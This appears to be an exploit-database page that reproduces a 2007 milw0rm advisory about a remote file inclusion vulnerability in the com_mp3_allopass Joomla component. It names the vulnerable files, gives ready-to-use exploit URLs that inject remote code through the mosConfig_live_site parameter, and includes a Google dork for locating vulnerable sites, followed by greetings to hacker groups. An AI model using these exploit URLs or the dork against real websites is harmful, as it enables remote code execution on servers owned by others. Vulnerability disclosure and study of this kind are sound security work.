header-logo
Suggest Exploit
vendor:
com_mp3_allopass
by:
NoGe
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: com_mp3_allopass
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

com_mp3_allopass joomla component Remote File Include Vulnerability

The com_mp3_allopass Joomla component is vulnerable to remote file inclusion. This vulnerability allows an attacker to include arbitrary remote files, which could lead to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update the com_mp3_allopass component to a patched version or remove it if not needed.
Source

Exploit-DB raw data:

# com_mp3_allopass joomla component Remote File Include Vulnerability

   Component       : com_mp3_allopass
   Download file   : http://www.joomlaratings.com
   Dicovered by    : NoGe
   Contact         : pace.noge@hotmail.com

==================================================================================================================================

# Vulnerable file

   /components/com_mp3_allopass/allopass.php

   line 3 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

   /components/com_mp3_allopass/allopass-error.php

   line 2 require_once("{$mosConfig_absolute_path}/components/com_mp3_allopass/allopass-conf.php");

# Exploit

   http://localhost/path/components/com_mp3_allopass/allopass.php?mosConfig_live_site=[evilcode]
   http://localhost/path/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=[evilcode]

# google dork

   inurl:com_mp3_allopass

==================================================================================================================================

# Greetz

   all member #papuahacker #nyubicrew #baliemhackerlink
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
   http://kapukvalley.net member

================================================================================================================================== 

# milw0rm.com [2007-10-10]

Navigation

Suggest Exploit

Services By CQR